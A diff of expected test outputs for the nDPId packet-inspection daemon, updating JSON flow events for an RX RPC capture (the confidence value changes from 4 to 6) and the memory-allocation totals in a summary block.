00561{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":1,"source":"rtsp_setup_http.pcapng","alias":"nDPId-test","packets-captured":1,"packets-processed":1,"total-skipped-flows":0,"total-l4-payload-len":179,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":1,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":1,"total-idle-flows":1,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":7,"global_ts_msec":1625568705778} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 1/1 @@ -13,9 +13,9 @@ ~~ total active/idle flows...: 1/1 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5871572 bytes -~~ total memory freed........: 5871572 bytes -~~ total allocations/frees...: 118117/118117 +~~ total memory allocated....: 6005206 bytes +~~ total memory freed........: 6005206 bytes +~~ total allocations/frees...: 120879/120879 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 473 chars ~~ json string max len.......: 818 chars diff --git a/test/results/rx.pcap.out b/test/results/rx.pcap.out index b9cd493ed..1c524a154 100644 --- a/test/results/rx.pcap.out +++ b/test/results/rx.pcap.out @@ -3,33 +3,33 @@ 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647264018,"flow_last_seen":1460647264018,"flow_idle_time":200000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1460647264018,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00823{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1460647264018,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":334,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":334,"pkt_l4_len":300,"thread_ts_msec":1460647264018,"pkt":"PIqwbTfwAAjK968mCABFAAFA5\/AAAEARo32DctuowKfOfKJXG1oBLBrkVw+1YFw\/yYgAAAABAAAAAQAAAAEBBQAAAAAASQAAAfgAAAABAAAAZwAAAGkAAABvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1460647264026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1460647264026,"pkt":"AAjK968mPIqwbTfwCABFAABAOykAADoRV0XAp858g3LbqBtaolcALPkKVw+1YFw\/yYgAAAABAAAAAQAAAAEBBAAAAAAASQAAAAEAACcR"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647264026,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647264026,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00518{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1460647264026,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647264026,"pkt":"PIqwbTfwAAjK968mCABFAABd5\/IAAEARpF6DctuowKfOfKJXG1oASRKnVw+1YFw\/yYgAAAABAAAAAAAAAAICIQAAAAAASQAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647283326,"flow_last_seen":1460647283326,"flow_idle_time":200000,"flow_min_l4_payload_len":292,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":292,"flow_avg_l4_payload_len":292,"midstream":0,"thread_ts_msec":1460647283326,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00821{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1460647283326,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":334,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":334,"pkt_l4_len":300,"thread_ts_msec":1460647283326,"pkt":"PIqwbTfwAAjK968mCABFAAFA6DUAAEARoziDctuowKfOfJW7G1oBLLHjVw+1c1wtPyQAAAABAAAAAQAAAAEBBQAAAAAASQAAAfgAAAABAAAAZwAAAGkAAABvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1460647283340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1460647283340,"pkt":"AAjK968mPIqwbTfwCABFAABATVwAADoRRRLAp858g3LbqBtalbsALJAKVw+1c1wtPyQAAAABAAAAAQAAAAEBBAAAAAAASQAAAAEAACcR"} -00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647283340,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00635{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":5,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":328,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1460647283340,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1460647283340,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647283340,"pkt":"PIqwbTfwAAjK968mCABFAABd6DcAAEARpBmDctuowKfOfJW7G1oASammVw+1c1wtPyQAAAABAAAAAAAAAAICIQAAAAAASQAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299605,"flow_last_seen":1460647299605,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":48,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1460647299605,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00490{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":7,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1460647299605,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":90,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":90,"pkt_l4_len":56,"thread_ts_msec":1460647299605,"pkt":"PIqwbTfwAAjK968mCABFAABM9uIAAEARlX+DctuowKfOfBtZG1sAOL9z1w+zMFwiT6wAAAABAAAAAQAAAAEBBQAAAAAANAAAAg8AAAAJcm9vdC5jZWxsAAAA"} 01894{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1460647299669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1118,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1118,"pkt_l4_len":1084,"thread_ts_msec":1460647299669,"pkt":"AAjK968mPIqwbTfwCABFAARQURUAADoRPUnAp858g3LbqBtbG1kEPOsl1w+zMFwiT6wAAAABAAAAAQAAAAEBBAAAAAAANAAAAHIAAABvAAAAbwAAAHQAAAAuAAAAYwAAAGUAAABsAAAAbAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAwBuMngAAEMHAAAfwf\/\/\/6MAAAAlAAAAAQAAAAEAAAAAAAAAf\/\/\/\/6oAAAB3AIQN5gAA+50AABAS\/\/\/\/mP\/\/\/4QAAAABAAAAAQAAAAAAAAB\/\/\/\/\/qgAAAHcAbjJ4AABDBwAAH8H\/\/\/+jAAAAJQAAAAEAAAABAAAAAAAAAH\/\/\/\/+qAAAAdwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADwAAAA8AAAAPAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAUAAAAEgAAABIAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAIAAAAyAAAAROcGeMAAAAAAAAcAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299605,"flow_last_seen":1460647299669,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1124,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1460647299669,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00636{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":8,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299605,"flow_last_seen":1460647299669,"flow_idle_time":200000,"flow_min_l4_payload_len":48,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":1124,"flow_avg_l4_payload_len":562,"midstream":0,"thread_ts_msec":1460647299669,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":9,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1460647299669,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647299669,"pkt":"PIqwbTfwAAjK968mCABFAABd9usAAEARlWWDctuowKfOfBtZG1sASZXi1w+zMFwiT6wAAAABAAAAAAAAAAICIQAAAAAANAAAAAAAAAACAAAAAQAAAAAIAAAAAAAAFjwAAAWkAAAAIAAAAAQ="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299704,"flow_last_seen":1460647299704,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1460647299704,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1460647299704,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460647299704,"pkt":"PIqwbTfwAAjK968mCABFAAA8LUMAAEARXrqDctuowKfO8RtZG1gAKKMX1w+zMFwiT7AAAAABAAAAAQAAAAEBBQAAAAAAAQABAAQ="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1460647299782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1460647299782,"pkt":"AAjK968mPIqwbTfwCABFAABeF80AADoReg7Ap87xg3LbqBtYG1kASo9g1w+zMFwiT7AAAAABAAAAAAAAAAECIgAAAAAAAQAAAAAAAAABAAAAAQAAAAAGAQEAAAAAAAWkAAAFpAAAABAAAAAB"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299704,"flow_last_seen":1460647299782,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647299782,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299704,"flow_last_seen":1460647299782,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647299782,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":15,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":3,"flow_last_seen":1460647299782,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647299782,"pkt":"PIqwbTfwAAjK968mCABFAABdLVQAAEARXoiDctuowKfO8RtZG1gASaag1w+zMFwiT7AAAAABAAAAAAAAAAICIQAAAAAAAQAAAAAAAAABAAAAAAAAAAEHAAAAAAAAFjwAAAWkAAAAEAAAAAQ="} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1460647299986,"flow_last_seen":1460647299986,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1460647299986,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1460647299986,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1460647299986,"pkt":"PIqwbTfwAAjK968mCABFAAA89w8AAEARlWKDctuowKfOfBtZG1gAKKOI1w+zMFwiT7QAAAABAAAAAQAAAAEBBQAAAAAAAQABAAQ="} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1460647300017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":108,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":108,"pkt_l4_len":74,"thread_ts_msec":1460647300017,"pkt":"AAjK968mPIqwbTfwCABFAABeUWIAADoRQO7Ap858g3LbqBtYG1kASjJ01w+zMFwiT7QAAAABAAAAAAAAAAECIgAAXV0AAQAAAAAAAAABAAAAAQAAAAAGAQEAAAAAAAWkAAAFpAAAABAAAAAB"} -00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299986,"flow_last_seen":1460647300017,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647300017,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00632{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":28,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1460647299986,"flow_last_seen":1460647300017,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":66,"flow_tot_l4_payload_len":98,"flow_avg_l4_payload_len":49,"midstream":0,"thread_ts_msec":1460647300017,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1460647300017,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":107,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":107,"pkt_l4_len":73,"thread_ts_msec":1460647300017,"pkt":"PIqwbTfwAAjK968mCABFAABd9xIAAEARlT6DctuowKfOfBtZG1gASacR1w+zMFwiT7QAAAABAAAAAAAAAAICIQAAAAAAAQAAAAAAAAABAAAAAAAAAAEHAAAAAAAAFjwAAAWkAAAAEAAAAAQ="} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":20,"flow_first_seen":1460647299986,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":468,"flow_tot_l4_payload_len":2302,"flow_avg_l4_payload_len":115,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":79,"flow_first_seen":1460647299704,"flow_last_seen":1460647320158,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":740,"flow_tot_l4_payload_len":9058,"flow_avg_l4_payload_len":114,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.241","src_port":7001,"dst_port":7000,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1460647299605,"flow_last_seen":1460647300326,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":1076,"flow_tot_l4_payload_len":8785,"flow_avg_l4_payload_len":325,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":7001,"dst_port":7003,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647283326,"flow_last_seen":1460647283340,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":38331,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":132,"source":"rx.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1460647264018,"flow_last_seen":1460647264026,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":292,"flow_tot_l4_payload_len":393,"flow_avg_l4_payload_len":131,"midstream":0,"thread_ts_msec":1460647320158,"l3_proto":"ip4","src_ip":"131.114.219.168","dst_ip":"192.167.206.124","src_port":41559,"dst_port":7002,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"RX","breed":"Acceptable","category":"RPC"}} 